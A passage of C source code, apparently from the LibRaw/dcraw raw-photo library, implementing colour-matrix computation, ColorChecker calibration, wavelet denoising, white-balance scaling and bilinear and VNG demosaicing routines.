return;
}
for (i=0; i < 0x10000; i++) {
curve[i] = 0xffff;
if ((r = (double) i / imax) < 1)
curve[i] = 0x10000 * ( mode
? (r < g[3] ? r*g[1] : (g[0] ? pow( r,g[0])*(1+g[4])-g[4] : log(r)*g[2]+1))
: (r < g[2] ? r/g[1] : (g[0] ? pow((r+g[4])/(1+g[4]),1/g[0]) : exp((r-1)/g[2]))));
}
}
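/*
   pseudoinverse(): forms in^T*in (3x3), inverts it with Gauss-Jordan
   elimination, and returns out = in * (in^T*in)^{-1}, i.e. the transpose
   of the Moore-Penrose pseudoinverse of the size x 3 matrix in[].
 */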
void CLASS pseudoinverse (double (*in)[3], double (*out)[3], int size)
{
double work[3][6], num;
int i, j, k;
for (i=0; i < 3; i++) {
for (j=0; j < 6; j++)
work[i][j] = j == i+3;
for (j=0; j < 3; j++)
for (k=0; k < size; k++)
work[i][j] += in[k][i] * in[k][j];
}
for (i=0; i < 3; i++) {
num = work[i][i];
for (j=0; j < 6; j++)
work[i][j] /= num;
for (k=0; k < 3; k++) {
if (k==i) continue;
num = work[k][i];
for (j=0; j < 6; j++)
work[k][j] -= work[i][j] * num;
}
}
for (i=0; i < size; i++)
for (j=0; j < 3; j++)
for (out[i][j]=k=0; k < 3; k++)
out[i][j] += work[j][k+3] * in[i][k];
}
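/*
   cam_xyz_coeff(): converts a camera-to-XYZ matrix into camera-to-RGB
   coefficients.  cam_rgb = cam_xyz * xyz_rgb is normalized so each row
   sums to one (the reciprocals become pre_mul[]), then its pseudoinverse
   gives _rgb_cam.
 */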
void CLASS cam_xyz_coeff (float _rgb_cam[3][4], double cam_xyz[4][3])
{
double cam_rgb[4][3], inverse[4][3], num;
int i, j, k;
for (i=0; i < colors; i++) /* Multiply out XYZ colorspace */
for (j=0; j < 3; j++)
for (cam_rgb[i][j] = k=0; k < 3; k++)
cam_rgb[i][j] += cam_xyz[i][k] * xyz_rgb[k][j];
for (i=0; i < colors; i++) { /* Normalize cam_rgb so that */
for (num=j=0; j < 3; j++) /* cam_rgb * (1,1,1) is (1,1,1,1) */
num += cam_rgb[i][j];
if(num > 0.00001)
{
for (j=0; j < 3; j++)
cam_rgb[i][j] /= num;
pre_mul[i] = 1 / num;
}
else
{
for (j=0; j < 3; j++)
cam_rgb[i][j] = 0.0;
pre_mul[i] = 1.0;
}
}
pseudoinverse (cam_rgb, inverse, colors);
for (i=0; i < 3; i++)
for (j=0; j < colors; j++)
_rgb_cam[i][j] = inverse[j][i];
}
#ifdef COLORCHECK
void CLASS colorcheck()
{
#define NSQ 24
// Coordinates of the GretagMacbeth ColorChecker squares
// width, height, 1st_column, 1st_row
int cut[NSQ][4]; // you must set these
// ColorChecker Chart under 6500-kelvin illumination
static const double gmb_xyY[NSQ][3] = {
{ 0.400, 0.350, 10.1 }, // Dark Skin
{ 0.377, 0.345, 35.8 }, // Light Skin
{ 0.247, 0.251, 19.3 }, // Blue Sky
{ 0.337, 0.422, 13.3 }, // Foliage
{ 0.265, 0.240, 24.3 }, // Blue Flower
{ 0.261, 0.343, 43.1 }, // Bluish Green
{ 0.506, 0.407, 30.1 }, // Orange
{ 0.211, 0.175, 12.0 }, // Purplish Blue
{ 0.453, 0.306, 19.8 }, // Moderate Red
{ 0.285, 0.202, 6.6 }, // Purple
{ 0.380, 0.489, 44.3 }, // Yellow Green
{ 0.473, 0.438, 43.1 }, // Orange Yellow
{ 0.187, 0.129, 6.1 }, // Blue
{ 0.305, 0.478, 23.4 }, // Green
{ 0.539, 0.313, 12.0 }, // Red
{ 0.448, 0.470, 59.1 }, // Yellow
{ 0.364, 0.233, 19.8 }, // Magenta
{ 0.196, 0.252, 19.8 }, // Cyan
{ 0.310, 0.316, 90.0 }, // White
{ 0.310, 0.316, 59.1 }, // Neutral 8
{ 0.310, 0.316, 36.2 }, // Neutral 6.5
{ 0.310, 0.316, 19.8 }, // Neutral 5
{ 0.310, 0.316, 9.0 }, // Neutral 3.5
{ 0.310, 0.316, 3.1 } }; // Black
double gmb_cam[NSQ][4], gmb_xyz[NSQ][3];
double inverse[NSQ][3], cam_xyz[4][3], balance[4], num;
int c, i, j, k, sq, row, col, pass, count[4];
memset (gmb_cam, 0, sizeof gmb_cam);
for (sq=0; sq < NSQ; sq++) {
FORCC count[c] = 0;
for (row=cut[sq][3]; row < cut[sq][3]+cut[sq][1]; row++)
for (col=cut[sq][2]; col < cut[sq][2]+cut[sq][0]; col++) {
c = FC(row,col);
if (c >= colors) c -= 2;
gmb_cam[sq][c] += BAYER2(row,col);
BAYER2(row,col) = black + (BAYER2(row,col)-black)/2;
count[c]++;
}
FORCC gmb_cam[sq][c] = gmb_cam[sq][c]/count[c] - black;
gmb_xyz[sq][0] = gmb_xyY[sq][2] * gmb_xyY[sq][0] / gmb_xyY[sq][1];
gmb_xyz[sq][1] = gmb_xyY[sq][2];
gmb_xyz[sq][2] = gmb_xyY[sq][2] *
(1 - gmb_xyY[sq][0] - gmb_xyY[sq][1]) / gmb_xyY[sq][1];
}
pseudoinverse (gmb_xyz, inverse, NSQ);
for (pass=0; pass < 2; pass++) {
for (raw_color = i=0; i < colors; i++)
for (j=0; j < 3; j++)
for (cam_xyz[i][j] = k=0; k < NSQ; k++)
cam_xyz[i][j] += gmb_cam[k][i] * inverse[k][j];
cam_xyz_coeff (rgb_cam, cam_xyz);
FORCC balance[c] = pre_mul[c] * gmb_cam[20][c];
for (sq=0; sq < NSQ; sq++)
FORCC gmb_cam[sq][c] *= balance[c];
}
if (verbose) {
printf (" { \"%s %s\", %d,\n\t{", make, model, black);
num = 10000 / (cam_xyz[1][0] + cam_xyz[1][1] + cam_xyz[1][2]);
FORCC for (j=0; j < 3; j++)
printf ("%c%d", (c | j) ? ',':' ', (int) (cam_xyz[c][j] * num + 0.5));
puts (" } },");
}
#undef NSQ
}
#endif
void CLASS hat_transform (float *temp, float *base, int st, int size, int sc)
{
int i;
for (i=0; i < sc; i++)
temp[i] = 2*base[st*i] + base[st*(sc-i)] + base[st*(i+sc)];
for (; i+sc < size; i++)
temp[i] = 2*base[st*i] + base[st*(i-sc)] + base[st*(i+sc)];
for (; i < size; i++)
temp[i] = 2*base[st*i] + base[st*(i-sc)] + base[st*(2*size-2-(i+sc))];
}
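/*
   wavelet_denoise(): five-level "a trous" wavelet decomposition of each
   channel (in the square-root domain), soft-thresholding of the detail
   coefficients by threshold*noise[lev], then recombination.  For
   three-colour Bayer data the two green channels are afterwards pulled
   toward each other.  Two implementations follow: plain and
   OpenMP-parallelised.
 */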
#if !defined(LIBRAW_USE_OPENMP)
void CLASS wavelet_denoise()
{
float *fimg=0, *temp, thold, mul[2], avg, diff;
int scale=1, size, lev, hpass, lpass, row, col, nc, c, i, wlast, blk[2];
ushort *window[4];
static const float noise[] =
{ 0.8002,0.2735,0.1202,0.0585,0.0291,0.0152,0.0080,0.0044 };
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("Wavelet denoising...\n"));
#endif
while (maximum << scale < 0x10000) scale++;
maximum <<= --scale;
black <<= scale;
FORC4 cblack[c] <<= scale;
if ((size = iheight*iwidth) < 0x15550000)
fimg = (float *) malloc ((size*3 + iheight + iwidth) * sizeof *fimg);
merror (fimg, "wavelet_denoise()");
temp = fimg + size*3;
if ((nc = colors) == 3 && filters) nc++;
FORC(nc) { /* denoise R,G1,B,G3 individually */
for (i=0; i < size; i++)
fimg[i] = 256 * sqrt((double)(image[i][c] << scale));
for (hpass=lev=0; lev < 5; lev++) {
lpass = size*((lev & 1)+1);
for (row=0; row < iheight; row++) {
hat_transform (temp, fimg+hpass+row*iwidth, 1, iwidth, 1 << lev);
for (col=0; col < iwidth; col++)
fimg[lpass + row*iwidth + col] = temp[col] * 0.25;
}
for (col=0; col < iwidth; col++) {
hat_transform (temp, fimg+lpass+col, iwidth, iheight, 1 << lev);
for (row=0; row < iheight; row++)
fimg[lpass + row*iwidth + col] = temp[row] * 0.25;
}
thold = threshold * noise[lev];
for (i=0; i < size; i++) {
fimg[hpass+i] -= fimg[lpass+i];
if (fimg[hpass+i] < -thold) fimg[hpass+i] += thold;
else if (fimg[hpass+i] > thold) fimg[hpass+i] -= thold;
else fimg[hpass+i] = 0;
if (hpass) fimg[i] += fimg[hpass+i];
}
hpass = lpass;
}
for (i=0; i < size; i++)
image[i][c] = CLIP(SQR(fimg[i]+fimg[lpass+i])/0x10000);
}
if (filters && colors == 3) { /* pull G1 and G3 closer together */
for (row=0; row < 2; row++) {
mul[row] = 0.125 * pre_mul[FC(row+1,0) | 1] / pre_mul[FC(row,0) | 1];
blk[row] = cblack[FC(row,0) | 1];
}
for (i=0; i < 4; i++)
window[i] = (ushort *) fimg + width*i;
for (wlast=-1, row=1; row < height-1; row++) {
while (wlast < row+1) {
for (wlast++, i=0; i < 4; i++)
window[(i+3) & 3] = window[i];
for (col = FC(wlast,1) & 1; col < width; col+=2)
window[2][col] = BAYER(wlast,col);
}
thold = threshold/512;
for (col = (FC(row,0) & 1)+1; col < width-1; col+=2) {
avg = ( window[0][col-1] + window[0][col+1] +
window[2][col-1] + window[2][col+1] - blk[~row & 1]*4 )
* mul[row & 1] + (window[1][col] + blk[row & 1]) * 0.5;
avg = avg < 0 ? 0 : sqrt(avg);
diff = sqrt((double)BAYER(row,col)) - avg;
if (diff < -thold) diff += thold;
else if (diff > thold) diff -= thold;
else diff = 0;
BAYER(row,col) = CLIP(SQR(avg+diff) + 0.5);
}
}
}
free (fimg);
}
#else /* LIBRAW_USE_OPENMP */
void CLASS wavelet_denoise()
{
float *fimg=0, *temp, thold, mul[2], avg, diff;
int scale=1, size, lev, hpass, lpass, row, col, nc, c, i, wlast, blk[2];
ushort *window[4];
static const float noise[] =
{ 0.8002,0.2735,0.1202,0.0585,0.0291,0.0152,0.0080,0.0044 };
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("Wavelet denoising...\n"));
#endif
while (maximum << scale < 0x10000) scale++;
maximum <<= --scale;
black <<= scale;
FORC4 cblack[c] <<= scale;
if ((size = iheight*iwidth) < 0x15550000)
fimg = (float *) malloc ((size*3 + iheight + iwidth) * sizeof *fimg);
merror (fimg, "wavelet_denoise()");
temp = fimg + size*3;
if ((nc = colors) == 3 && filters) nc++;
#ifdef LIBRAW_LIBRARY_BUILD
#pragma omp parallel default(shared) private(i,col,row,thold,lev,lpass,hpass,temp,c) firstprivate(scale,size)
#endif
{
temp = (float*)malloc( (iheight + iwidth) * sizeof *fimg);
FORC(nc) { /* denoise R,G1,B,G3 individually */
#ifdef LIBRAW_LIBRARY_BUILD
#pragma omp for
#endif
for (i=0; i < size; i++)
fimg[i] = 256 * sqrt((double)(image[i][c] << scale));
for (hpass=lev=0; lev < 5; lev++) {
lpass = size*((lev & 1)+1);
#ifdef LIBRAW_LIBRARY_BUILD
#pragma omp for
#endif
for (row=0; row < iheight; row++) {
hat_transform (temp, fimg+hpass+row*iwidth, 1, iwidth, 1 << lev);
for (col=0; col < iwidth; col++)
fimg[lpass + row*iwidth + col] = temp[col] * 0.25;
}
#ifdef LIBRAW_LIBRARY_BUILD
#pragma omp for
#endif
for (col=0; col < iwidth; col++) {
hat_transform (temp, fimg+lpass+col, iwidth, iheight, 1 << lev);
for (row=0; row < iheight; row++)
fimg[lpass + row*iwidth + col] = temp[row] * 0.25;
}
thold = threshold * noise[lev];
#ifdef LIBRAW_LIBRARY_BUILD
#pragma omp for
#endif
for (i=0; i < size; i++) {
fimg[hpass+i] -= fimg[lpass+i];
if (fimg[hpass+i] < -thold) fimg[hpass+i] += thold;
else if (fimg[hpass+i] > thold) fimg[hpass+i] -= thold;
else fimg[hpass+i] = 0;
if (hpass) fimg[i] += fimg[hpass+i];
}
hpass = lpass;
}
#ifdef LIBRAW_LIBRARY_BUILD
#pragma omp for
#endif
for (i=0; i < size; i++)
image[i][c] = CLIP(SQR(fimg[i]+fimg[lpass+i])/0x10000);
}
free(temp);
} /* end omp parallel */
  /* the following loops are hard to parallelize, no good idea yet:
   * the problem is wlast, which carries a loop dependency.
   * The second part should be easier, but we did not yet get it right.
   */
if (filters && colors == 3) { /* pull G1 and G3 closer together */
for (row=0; row < 2; row++){
mul[row] = 0.125 * pre_mul[FC(row+1,0) | 1] / pre_mul[FC(row,0) | 1];
blk[row] = cblack[FC(row,0) | 1];
}
for (i=0; i < 4; i++)
window[i] = (ushort *) fimg + width*i;
for (wlast=-1, row=1; row < height-1; row++) {
while (wlast < row+1) {
for (wlast++, i=0; i < 4; i++)
window[(i+3) & 3] = window[i];
for (col = FC(wlast,1) & 1; col < width; col+=2)
window[2][col] = BAYER(wlast,col);
}
thold = threshold/512;
for (col = (FC(row,0) & 1)+1; col < width-1; col+=2) {
avg = ( window[0][col-1] + window[0][col+1] +
window[2][col-1] + window[2][col+1] - blk[~row & 1]*4 )
* mul[row & 1] + (window[1][col] + blk[row & 1]) * 0.5;
avg = avg < 0 ? 0 : sqrt(avg);
diff = sqrt((double)BAYER(row,col)) - avg;
if (diff < -thold) diff += thold;
else if (diff > thold) diff -= thold;
else diff = 0;
BAYER(row,col) = CLIP(SQR(avg+diff) + 0.5);
}
}
}
free (fimg);
}
#endif
// green equilibration
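// For each G2 site, compare the local means of the two green channels and
// rescale the pixel when the neighbourhood is smooth (variation below thr)
// and not near saturation.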
void CLASS green_matching()
{
int i,j;
double m1,m2,c1,c2;
int o1_1,o1_2,o1_3,o1_4;
int o2_1,o2_2,o2_3,o2_4;
ushort (*img)[4];
const int margin = 3;
int oj = 2, oi = 2;
float f;
const float thr = 0.01f;
if(half_size || shrink) return;
if(FC(oj, oi) != 3) oj++;
if(FC(oj, oi) != 3) oi++;
if(FC(oj, oi) != 3) oj--;
img = (ushort (*)[4]) calloc (height*width, sizeof *image);
merror (img, "green_matching()");
memcpy(img,image,height*width*sizeof *image);
for(j=oj;j<height-margin;j+=2)
for(i=oi;i<width-margin;i+=2){
o1_1=img[(j-1)*width+i-1][1];
o1_2=img[(j-1)*width+i+1][1];
o1_3=img[(j+1)*width+i-1][1];
o1_4=img[(j+1)*width+i+1][1];
o2_1=img[(j-2)*width+i][3];
o2_2=img[(j+2)*width+i][3];
o2_3=img[j*width+i-2][3];
o2_4=img[j*width+i+2][3];
m1=(o1_1+o1_2+o1_3+o1_4)/4.0;
m2=(o2_1+o2_2+o2_3+o2_4)/4.0;
c1=(abs(o1_1-o1_2)+abs(o1_1-o1_3)+abs(o1_1-o1_4)+abs(o1_2-o1_3)+abs(o1_3-o1_4)+abs(o1_2-o1_4))/6.0;
c2=(abs(o2_1-o2_2)+abs(o2_1-o2_3)+abs(o2_1-o2_4)+abs(o2_2-o2_3)+abs(o2_3-o2_4)+abs(o2_2-o2_4))/6.0;
if((img[j*width+i][3]<maximum*0.95)&&(c1<maximum*thr)&&(c2<maximum*thr))
{
f = image[j*width+i][3]*m1/m2;
image[j*width+i][3]=f>0xffff?0xffff:f;
}
}
free(img);
}
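/*
   scale_colors(): derives the white-balance multipliers - from the user,
   from an auto-WB average over greybox, or from the camera's stored
   multipliers / white sample - then subtracts the black levels and scales
   every channel to fill the 16-bit range, optionally correcting lateral
   chromatic aberration with the aber[] factors.
 */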
void CLASS scale_colors()
{
unsigned bottom, right, size, row, col, ur, uc, i, x, y, c, sum[8];
int val, dark, sat;
double dsum[8], dmin, dmax;
float scale_mul[4], fr, fc;
ushort *img=0, *pix;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_SCALE_COLORS,0,2);
#endif
if (user_mul[0])
memcpy (pre_mul, user_mul, sizeof pre_mul);
if (use_auto_wb || (use_camera_wb && cam_mul[0] == -1)) {
memset (dsum, 0, sizeof dsum);
bottom = MIN (greybox[1]+greybox[3], height);
right = MIN (greybox[0]+greybox[2], width);
for (row=greybox[1]; row < bottom; row += 8)
for (col=greybox[0]; col < right; col += 8) {
memset (sum, 0, sizeof sum);
for (y=row; y < row+8 && y < bottom; y++)
for (x=col; x < col+8 && x < right; x++)
FORC4 {
if (filters) {
c = fcol(y,x);
val = BAYER2(y,x);
} else
val = image[y*width+x][c];
if (val > maximum-25) goto skip_block;
if ((val -= cblack[c]) < 0) val = 0;
sum[c] += val;
sum[c+4]++;
if (filters) break;
}
FORC(8) dsum[c] += sum[c];
skip_block: ;
}
FORC4 if (dsum[c]) pre_mul[c] = dsum[c+4] / dsum[c];
}
if (use_camera_wb && cam_mul[0] != -1) {
memset (sum, 0, sizeof sum);
for (row=0; row < 8; row++)
for (col=0; col < 8; col++) {
c = FC(row,col);
if ((val = white[row][col] - cblack[c]) > 0)
sum[c] += val;
sum[c+4]++;
}
#ifdef LIBRAW_LIBRARY_BUILD
if(load_raw == &LibRaw::nikon_load_sraw)
{
// Nikon sRAW: camera WB already applied:
pre_mul[0]=pre_mul[1]=pre_mul[2]=pre_mul[3]=1.0;
}
else
#endif
if (sum[0] && sum[1] && sum[2] && sum[3])
FORC4 pre_mul[c] = (float) sum[c+4] / sum[c];
else if (cam_mul[0] && cam_mul[2])
memcpy (pre_mul, cam_mul, sizeof pre_mul);
else
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_BAD_CAMERA_WB;
#endif
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s: Cannot use camera white balance.\n"), ifname);
#endif
}
}
#ifdef LIBRAW_LIBRARY_BUILD
// Nikon sRAW, daylight
if (load_raw == &LibRaw::nikon_load_sraw
&& !use_camera_wb && !use_auto_wb
&& cam_mul[0] > 0.001f && cam_mul[1] > 0.001f && cam_mul[2] > 0.001f )
{
for(c=0;c<3;c++)
pre_mul[c]/=cam_mul[c];
}
#endif
if (pre_mul[1] == 0) pre_mul[1] = 1;
if (pre_mul[3] == 0) pre_mul[3] = colors < 4 ? pre_mul[1] : 1;
dark = black;
sat = maximum;
if (threshold) wavelet_denoise();
maximum -= black;
for (dmin=DBL_MAX, dmax=c=0; c < 4; c++) {
if (dmin > pre_mul[c])
dmin = pre_mul[c];
if (dmax < pre_mul[c])
dmax = pre_mul[c];
}
if (!highlight) dmax = dmin;
FORC4 scale_mul[c] = (pre_mul[c] /= dmax) * 65535.0 / maximum;
#ifdef DCRAW_VERBOSE
if (verbose) {
fprintf (stderr,
_("Scaling with darkness %d, saturation %d, and\nmultipliers"), dark, sat);
FORC4 fprintf (stderr, " %f", pre_mul[c]);
fputc ('\n', stderr);
}
#endif
if (filters > 1000 && (cblack[4]+1)/2 == 1 && (cblack[5]+1)/2 == 1) {
FORC4 cblack[FC(c/2,c%2)] +=
cblack[6 + c/2 % cblack[4] * cblack[5] + c%2 % cblack[5]];
cblack[4] = cblack[5] = 0;
}
size = iheight*iwidth;
#ifdef LIBRAW_LIBRARY_BUILD
scale_colors_loop(scale_mul);
#else
for (i=0; i < size*4; i++) {
if (!(val = ((ushort *)image)[i])) continue;
if (cblack[4] && cblack[5])
val -= cblack[6 + i/4 / iwidth % cblack[4] * cblack[5] +
i/4 % iwidth % cblack[5]];
val -= cblack[i & 3];
val *= scale_mul[i & 3];
((ushort *)image)[i] = CLIP(val);
}
#endif
if ((aber[0] != 1 || aber[2] != 1) && colors == 3) {
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr,_("Correcting chromatic aberration...\n"));
#endif
for (c=0; c < 4; c+=2) {
if (aber[c] == 1) continue;
img = (ushort *) malloc (size * sizeof *img);
merror (img, "scale_colors()");
for (i=0; i < size; i++)
img[i] = image[i][c];
for (row=0; row < iheight; row++) {
ur = fr = (row - iheight*0.5) * aber[c] + iheight*0.5;
if (ur > iheight-2) continue;
fr -= ur;
for (col=0; col < iwidth; col++) {
uc = fc = (col - iwidth*0.5) * aber[c] + iwidth*0.5;
if (uc > iwidth-2) continue;
fc -= uc;
pix = img + ur*iwidth + uc;
image[row*iwidth+col][c] =
(pix[ 0]*(1-fc) + pix[ 1]*fc) * (1-fr) +
(pix[iwidth]*(1-fc) + pix[iwidth+1]*fc) * fr;
}
}
free(img);
}
}
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_SCALE_COLORS,1,2);
#endif
}
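/* pre_interpolate() prepares the mosaic for demosaicing:
 *  - with half_size the shrunken buffer simply becomes the output (missing
 *    red/blue of half-size X-Trans data are averaged from vertical neighbors),
 *  - with shrink but not half_size the small buffer is expanded back to full
 *    resolution, placing each sample at its CFA position,
 *  - for RGB Bayer data the two greens are either kept as a fourth color
 *    (four_color_rgb / half_size) or G2 is folded into G1 and removed from
 *    the filter pattern.
 */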
void CLASS pre_interpolate()
{
ushort (*img)[4];
int row, col, c;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_PRE_INTERPOLATE,0,2);
#endif
if (shrink) {
if (half_size) {
height = iheight;
width = iwidth;
if (filters == 9) {
for (row=0; row < 3; row++)
for (col=1; col < 4; col++)
if (!(image[row*width+col][0] | image[row*width+col][2]))
goto break2; break2:
for ( ; row < height; row+=3)
for (col=(col-1)%3+1; col < width-1; col+=3) {
img = image + row*width+col;
for (c=0; c < 3; c+=2)
img[0][c] = (img[-1][c] + img[1][c]) >> 1;
}
}
} else {
img = (ushort (*)[4]) calloc (height, width*sizeof *img);
merror (img, "pre_interpolate()");
for (row=0; row < height; row++)
for (col=0; col < width; col++) {
c = fcol(row,col);
img[row*width+col][c] = image[(row >> 1)*iwidth+(col >> 1)][c];
}
free (image);
image = img;
shrink = 0;
}
}
if (filters > 1000 && colors == 3) {
mix_green = four_color_rgb ^ half_size;
if (four_color_rgb | half_size) colors++;
else {
for (row = FC(1,0) >> 1; row < height; row+=2)
for (col = FC(row,1) & 1; col < width; col+=2)
image[row*width+col][1] = image[row*width+col][3];
filters &= ~((filters & 0x55555555) << 1);
}
}
if (half_size) filters = 0;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_PRE_INTERPOLATE,1,2);
#endif
}
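/* border_interpolate() fills the missing colors in a border-pixel-wide frame
 * around the image with a plain average of the like-colored neighbors, since
 * the full demosaicing kernels cannot be applied at the edges.
 */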
void CLASS border_interpolate (int border)
{
unsigned row, col, y, x, f, c, sum[8];
for (row=0; row < height; row++)
for (col=0; col < width; col++) {
if (col==border && row >= border && row < height-border)
col = width-border;
memset (sum, 0, sizeof sum);
for (y=row-1; y != row+2; y++)
for (x=col-1; x != col+2; x++)
if (y < height && x < width) {
f = fcol(y,x);
sum[f] += image[y*width+x][f];
sum[f+4]++;
}
f = fcol(row,col);
FORCC if (c != f && sum[c+4])
image[row*width+col][c] = sum[c] / sum[c+4];
}
}
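/* lin_interpolate_loop() replays the per-CFA-position code[] tables built by
 * lin_interpolate(): each entry is an (offset, shift, color) triple for a
 * weighted sum of neighbors, followed by (color, 256/weight-sum) pairs used
 * to normalize the accumulated sums.
 */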
void CLASS lin_interpolate_loop(int code[16][16][32],int size)
{
int row;
for (row=1; row < height-1; row++)
{
int col,*ip;
ushort *pix;
for (col=1; col < width-1; col++) {
int i;
int sum[4];
pix = image[row*width+col];
ip = code[row % size][col % size];
memset (sum, 0, sizeof sum);
for (i=*ip++; i--; ip+=3)
sum[ip[2]] += pix[ip[0]] << ip[1];
for (i=colors; --i; ip+=2)
pix[ip[0]] = sum[ip[0]] * ip[1] >> 8;
}
}
}
void CLASS lin_interpolate()
{
int code[16][16][32], size=16, *ip, sum[4];
int f, c, x, y, row, col, shift, color;
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("Bilinear interpolation...\n"));
#endif
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_INTERPOLATE,0,3);
#endif
if (filters == 9) size = 6;
border_interpolate(1);
for (row=0; row < size; row++)
for (col=0; col < size; col++) {
ip = code[row][col]+1;
f = fcol(row,col);
memset (sum, 0, sizeof sum);
for (y=-1; y <= 1; y++)
for (x=-1; x <= 1; x++) {
shift = (y==0) + (x==0);
color = fcol(row+y,col+x);
if (color == f) continue;
*ip++ = (width*y + x)*4 + color;
*ip++ = shift;
*ip++ = color;
sum[color] += 1 << shift;
}
code[row][col][0] = (ip - code[row][col]) / 3;
FORCC
if (c != f) {
*ip++ = c;
*ip++ = sum[c]>0?256 / sum[c]:0;
}
}
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_INTERPOLATE,1,3);
#endif
lin_interpolate_loop(code,size);
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_INTERPOLATE,2,3);
#endif
}
/*
This algorithm is officially called:
"Interpolation using a Threshold-based variable number of gradients"
described in http://scien.stanford.edu/pages/labsite/1999/psych221/projects/99/tingchen/algodep/vargra.html
I've extended the basic idea to work with non-Bayer filter arrays.
Gradients are numbered clockwise from NW=0 to W=7.
*/
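/* vng_interpolate() first expands the static terms[] table below into a
 * per-CFA-position "program" (pixel offsets, shift weights and the gradient
 * directions each pair contributes to), so the per-pixel loop only replays
 * the precomputed lists when accumulating the eight gradients.
 */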
void CLASS vng_interpolate()
{
static const signed char *cp, terms[] = {
-2,-2,+0,-1,0,0x01, -2,-2,+0,+0,1,0x01, -2,-1,-1,+0,0,0x01,
-2,-1,+0,-1,0,0x02, -2,-1,+0,+0,0,0x03, -2,-1,+0,+1,1,0x01,
-2,+0,+0,-1,0,0x06, -2,+0,+0,+0,1,0x02, -2,+0,+0,+1,0,0x03,
-2,+1,-1,+0,0,0x04, -2,+1,+0,-1,1,0x04, -2,+1,+0,+0,0,0x06,
-2,+1,+0,+1,0,0x02, -2,+2,+0,+0,1,0x04, -2,+2,+0,+1,0,0x04,
-1,-2,-1,+0,0,-128, -1,-2,+0,-1,0,0x01, -1,-2,+1,-1,0,0x01,
-1,-2,+1,+0,1,0x01, -1,-1,-1,+1,0,-120, -1,-1,+1,-2,0,0x40,
-1,-1,+1,-1,0,0x22, -1,-1,+1,+0,0,0x33, -1,-1,+1,+1,1,0x11,
-1,+0,-1,+2,0,0x08, -1,+0,+0,-1,0,0x44, -1,+0,+0,+1,0,0x11,
-1,+0,+1,-2,1,0x40, -1,+0,+1,-1,0,0x66, -1,+0,+1,+0,1,0x22,
-1,+0,+1,+1,0,0x33, -1,+0,+1,+2,1,0x10, -1,+1,+1,-1,1,0x44,
-1,+1,+1,+0,0,0x66, -1,+1,+1,+1,0,0x22, -1,+1,+1,+2,0,0x10,
-1,+2,+0,+1,0,0x04, -1,+2,+1,+0,1,0x04, -1,+2,+1,+1,0,0x04,
+0,-2,+0,+0,1,-128, +0,-1,+0,+1,1,-120, +0,-1,+1,-2,0,0x40,
+0,-1,+1,+0,0,0x11, +0,-1,+2,-2,0,0x40, +0,-1,+2,-1,0,0x20,
+0,-1,+2,+0,0,0x30, +0,-1,+2,+1,1,0x10, +0,+0,+0,+2,1,0x08,
+0,+0,+2,-2,1,0x40, +0,+0,+2,-1,0,0x60, +0,+0,+2,+0,1,0x20,
+0,+0,+2,+1,0,0x30, +0,+0,+2,+2,1,0x10, +0,+1,+1,+0,0,0x44,
+0,+1,+1,+2,0,0x10, +0,+1,+2,-1,1,0x40, +0,+1,+2,+0,0,0x60,
+0,+1,+2,+1,0,0x20, +0,+1,+2,+2,0,0x10, +1,-2,+1,+0,0,-128,
+1,-1,+1,+1,0,-120, +1,+0,+1,+2,0,0x08, +1,+0,+2,-1,0,0x40,
+1,+0,+2,+1,0,0x10
}, chood[] = { -1,-1, -1,0, -1,+1, 0,+1, +1,+1, +1,0, +1,-1, 0,-1 };
ushort (*brow[5])[4], *pix;
int prow=8, pcol=2, *ip, *code[16][16], gval[8], gmin, gmax, sum[4];
int row, col, x, y, x1, x2, y1, y2, t, weight, grads, color, diag;
int g, diff, thold, num, c;
lin_interpolate();
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("VNG interpolation...\n"));
#endif
if (filters == 1) prow = pcol = 16;
if (filters == 9) prow = pcol = 6;
ip = (int *) calloc (prow*pcol, 1280);
merror (ip, "vng_interpolate()");
for (row=0; row < prow; row++) /* Precalculate for VNG */
for (col=0; col < pcol; col++) {
code[row][col] = ip;
for (cp=terms, t=0; t < 64; t++) {
y1 = *cp++; x1 = *cp++;
y2 = *cp++; x2 = *cp++;
weight = *cp++;
grads = *cp++;
color = fcol(row+y1,col+x1);
if (fcol(row+y2,col+x2) != color) continue;
diag = (fcol(row,col+1) == color && fcol(row+1,col) == color) ? 2:1;
if (abs(y1-y2) == diag && abs(x1-x2) == diag) continue;
*ip++ = (y1*width + x1)*4 + color;
*ip++ = (y2*width + x2)*4 + color;
*ip++ = weight;
for (g=0; g < 8; g++)
if (grads & 1<<g) *ip++ = g;
*ip++ = -1;
}
*ip++ = INT_MAX;
for (cp=chood, g=0; g < 8; g++) {
y = *cp++; x = *cp++;
*ip++ = (y*width + x) * 4;
color = fcol(row,col);
if (fcol(row+y,col+x) != color && fcol(row+y*2,col+x*2) == color)
*ip++ = (y*width + x) * 8 + color;
else
*ip++ = 0;
}
}
brow[4] = (ushort (*)[4]) calloc (width*3, sizeof **brow);
merror (brow[4], "vng_interpolate()");
for (row=0; row < 3; row++)
brow[row] = brow[4] + row*width;
for (row=2; row < height-2; row++) { /* Do VNG interpolation */
#ifdef LIBRAW_LIBRARY_BUILD
if(!((row-2)%256))RUN_CALLBACK(LIBRAW_PROGRESS_INTERPOLATE,(row-2)/256+1,((height-3)/256)+1);
#endif
for (col=2; col < width-2; col++) {
pix = image[row*width+col];
ip = code[row % prow][col % pcol];
memset (gval, 0, sizeof gval);
while ((g = ip[0]) != INT_MAX) { /* Calculate gradients */
diff = ABS(pix[g] - pix[ip[1]]) << ip[2];
gval[ip[3]] += diff;
ip += 5;
if ((g = ip[-1]) == -1) continue;
gval[g] += diff;
